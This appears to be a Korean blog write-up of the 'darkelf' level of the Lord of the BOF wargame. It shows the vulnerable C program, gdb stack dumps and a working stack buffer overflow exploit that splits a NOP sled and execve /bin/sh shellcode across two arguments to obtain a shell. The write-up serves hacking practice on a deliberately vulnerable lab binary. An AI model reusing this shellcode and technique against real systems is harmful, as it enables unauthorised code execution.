소스를 보면
[wolfman@localhost wolfman]$ cat darkelf.c
/*
The Lord of the BOF : The Fellowship of the BOF
- darkelf
- egghunter + buffer hunter + check length of argv[1]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
레벨이 올라갈때마다 소스에 뭔가가 추가 되는데 이번에는 두번째 인자가 48 보다 클경우에는 뒤의 내용이 씹히게 됩니다.
따라서 세번째 인자까지 사용하여 문제를 풀면됩니다.
흐름을 보면
|buffer [ 40 ] | SFP | RETN |
이렇게 되는데 페이로드를 구성해보면
| NOP 44 | RETN | NOP 200 | 쉘코드 |
여기서 중요한건
NOP 44 부터 RETN 까지는 두번째 인자로 , NOP 200 ~ 쉘코드는 세번쨰 인자로 쪼개 넣어주는 겁니다
(perl을 두번사용하고 중간에 띄어쓰기)
그리고 페이로드에 넣어야할 RETN에 들어갈 주소를 이번엔 디버깅하여 손수 찾아 넣어 주었습니다
[wolfman@localhost /tmp]$ gdb -q darkelf
(gdb) b main
Breakpoint 1 at 0x8048506
(gdb) r $(perl -e 'print "\x90"x44,"AAA\xbf"') $(perl -e 'print "\x90"x200,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
Starting program: /tmp/darkelf $(perl -e 'print "\x90"x44,"AAA\xbf"') $(perl -e 'print "\x90"x200,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"')
(gdb) x/500x $esp
0xbffff8dc: 0x40021ca0 0xbffff908 0x4000a970 0x400f855b
0xbffff8ec: 0x080496ec 0x4000ae60 0xbffff954 0xbffff908
0xbffff8fc: 0x080484eb 0x080496d8 0x080496ec 0xbffff928
0xbffff90c: 0x400309cb 0x00000003 0xbffff954 0xbffff964
0xbffff91c: 0x40013868 0x00000003 0x08048450 0x00000000
0xbffff92c: 0x08048471 0x08048500 0x00000003 0xbffff954
0xbffff93c: 0x08048390 0x0804865c 0x4000ae60 0xbffff94c
0xbffff94c: 0x40013e90 0x00000003 0xbffffa5f 0xbffffa6c
0xbffff95c: 0xbffffa9d 0x00000000 0xbffffb7e 0xbffffb87
0xbffff96c: 0xbffffb9f 0xbffffbbe 0xbffffbe0 0xbffffcca
0xbffff97c: 0xbffffcd7 0xbffffe9a 0xbffffeb9 0xbffffed6
0xbffff98c: 0xbffffeeb 0xbfffff0a 0xbfffff15 0xbfffff2e
0xbffff99c: 0xbfffff3e 0xbfffff46 0xbfffff57 0xbfffff61
0xbffff9ac: 0xbfffff6f 0xbfffff80 0xbfffff8e 0xbfffff99
0xbffff9bc: 0xbfffffac 0x00000000 0x00000003 0x08048034
0xbffff9cc: 0x00000004 0x00000020 0x00000005 0x00000006
0xbffff9dc: 0x00000006 0x00001000 0x00000007 0x40000000
0xbffff9ec: 0x00000008 0x00000000 0x00000009 0x08048450
0xbffff9fc: 0x0000000b 0x000001f9 0x0000000c 0x000001f9
0xbffffa0c: 0x0000000d 0x000001f9 0x0000000e 0x000001f9
0xbffffa1c: 0x00000010 0x0fabfbff 0x0000000f 0xbffffa5a
0xbffffa2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa4c: 0x00000000 0x00000000 0x00000000 0x36690000
0xbffffa5c: 0x2f003638 0x2f706d74 0x6b726164 0x00666c65
0xbffffa6c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa7c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffa8c: 0x90909090 0x90909090 0x90909090 0xbf414141// 이부분 이후
0xbffffa9c: 0x90909000 0x90909090 0x90909090 0x90909090
0xbffffaac: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffabc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffacc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffadc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffaec: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffafc: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb0c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb1c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb2c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb3c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb4c: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb5c: 0x90909090 0x90909090 0x50c03190 0x732f2f68
0xbffffb6c: 0x622f6868 0xe3896e69 0xe1895350 0xcd0bb099
0xbffffb7c: 0x57500080 0x742f3d44 0x5200706d 0x544f4d45
0xbffffb8c: 0x534f4845 0x39313d54 0x36312e32 0x32372e38
0xbffffb9c: 0x4800312e 0x4e54534f 0x3d454d41 0x61636f6c
0xbffffbac: 0x736f686c 0x6f6c2e74 0x646c6163 0x69616d6f
---Type <return> to continue, or q <return> to quit---
굵은 부분으로 표시해둔 부분 이후에 썰매가 계속해서 진행되므로 한부분을 임의로 지정해서 넣어주게되면
[wolfman@localhost wolfman]$ ./darkelf `perl -e 'print "\x90"x44,"\xbc\xfa\xff\xbf"'` `perl -e 'print"\x90"x200,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
????????????????????????????????????????????술
bash$ my-pass
euid = 506
kernel crashed
쉘이따집니다
'과거의 컴퓨터 공부 > LOB(完)' 카테고리의 다른 글
| (LOB)Level8.orge (0) | 2014.08.14 |
|---|---|
| (LOB)level7.darkelf (0) | 2014.08.11 |
| (LOB)Level5.orc (0) | 2014.08.11 |
| (LOB)Level4.goblin (0) | 2014.08.11 |
| (LOB)Level3.Cobolt (1) | 2014.08.10 |